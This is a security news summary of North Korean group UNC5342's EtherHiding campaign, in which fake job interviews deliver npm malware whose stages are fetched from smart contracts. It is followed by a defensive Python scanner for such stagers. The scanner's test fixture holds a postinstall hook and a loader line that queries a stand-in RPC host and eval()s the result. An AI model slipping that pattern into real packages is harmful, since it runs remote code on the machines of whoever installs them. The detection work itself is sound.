Centre for Sustainable Cybersecurity Technology

EtherHiding Used by North Korean Group to Deliver Modular Malware

North Korean-linked actors tied to UNC5342 have adopted EtherHiding to distribute malware and steal cryptocurrency, marking a novel state-sponsored use of blockchain stagers. In the Contagious Interview campaign, operators contact developers on LinkedIn, move the conversation to Telegram or Discord, and trick targets into running code purportedly part of a technical assessment. The chain starts with malicious npm packages that drop BeaverTail, a JavaScript stealer that harvests wallets, browser data and credentials. A downloader named JADESNOW then queries malicious smart contracts on BSC or Ethereum to retrieve InvisibleFerret, a JavaScript backdoor that enables remote control and long-term data exfiltration. The attackers also install a portable Python runtime to run an additional stealer fetched from another contract. EtherHiding embeds payloads in updatable smart contracts, providing resilience and anonymity while costing minimal gas. Google TAG's attribution to UNC5342 shows that nation-state groups are weaponizing decentralized platforms to build takedown-resistant, modular malware pipelines. Defenders must therefore monitor for blockchain-based artifacts and be prepared to respond.
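As an added example (not from the original article or from Google's report), a small Python triage heuristic a defender could run over an unpacked npm package before installing it: it flags source files that combine a read-only smart-contract query against a public BSC or Ethereum JSON-RPC endpoint with local dynamic code execution, the shape of a JADESNOW-style stager, and notes install-time lifecycle hooks in package.json. The endpoint names, regexes and sample files are constructed assumptions, not indicators from the campaign.

```python
import re
from dataclasses import dataclass, field

# Heuristics for a blockchain-stager loader: a read-only contract query whose
# result is executed locally. Endpoint names are generic public RPC providers
# (assumed indicators), not addresses or endpoints taken from the campaign.
RPC_ENDPOINT = re.compile(
    r"https?://\S*(bsc-dataseed|binance\.org|infura\.io|alchemy\.com|ankr\.com|cloudflare-eth\.com)", re.I)
CONTRACT_READ = re.compile(r"eth_call|eth_getStorageAt|\.call\(\s*\{\s*to\s*:|\.methods\.\w+\([^)]*\)\.call\(")
DYNAMIC_EXEC = re.compile(r"\beval\s*\(|new\s+Function\s*\(|vm\.runIn\w*Context\s*\(|child_process")
EVM_ADDRESS = re.compile(r"0x[0-9a-fA-F]{40}\b")
INSTALL_HOOK = re.compile(r'"(pre|post)?install"\s*:')  # npm lifecycle scripts run on install

@dataclass
class Finding:
    path: str
    indicators: list = field(default_factory=list)

    @property
    def severity(self):
        s = set(self.indicators)
        if {"contract_read", "dynamic_exec"} <= s:  # fetch-from-chain plus execute: stager shape
            return "high"
        if "contract_read" in s or "rpc_endpoint" in s:
            return "medium"
        return "low" if s else "none"

def scan_file(path, text):
    checks = [("rpc_endpoint", RPC_ENDPOINT), ("contract_read", CONTRACT_READ),
              ("dynamic_exec", DYNAMIC_EXEC), ("evm_address", EVM_ADDRESS)]
    if path.endswith("package.json"):
        checks.append(("install_hook", INSTALL_HOOK))
    return Finding(path, [name for name, rx in checks if rx.search(text)])

def scan_package(files):
    """files: {relative path: source text}. Returns only files carrying indicators."""
    return [f for f in (scan_file(p, t) for p, t in files.items()) if f.indicators]

# Constructed fixture shaped like a coding "assessment" package; not the campaign's code.
SAMPLE_FILES = {
    "package.json": '{"name":"interview-task","scripts":{"postinstall":"node setup.js"}}',
    "setup.js": ('const q = {method: "eth_call", params: [{to: "0x' + "ab" * 20 + '", data: "0x"}, "latest"]};\n'
                 'fetch("https://bsc-dataseed.example.invalid/", {method: "POST", body: JSON.stringify(q)})\n'
                 '  .then(r => r.json()).then(j => eval(decode(j.result)));'),
    "lib/util.js": "module.exports = { add: (a, b) => a + b };",
}

if __name__ == "__main__":
    for f in scan_package(SAMPLE_FILES):
        print(f"{f.severity:6} {f.path}: {', '.join(f.indicators)}")
```

A "high" finding is a review trigger, not a verdict: legitimate dApp tooling also reads contracts, so the combination with dynamic execution and an install hook is what earns a closer look.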

21-10-2025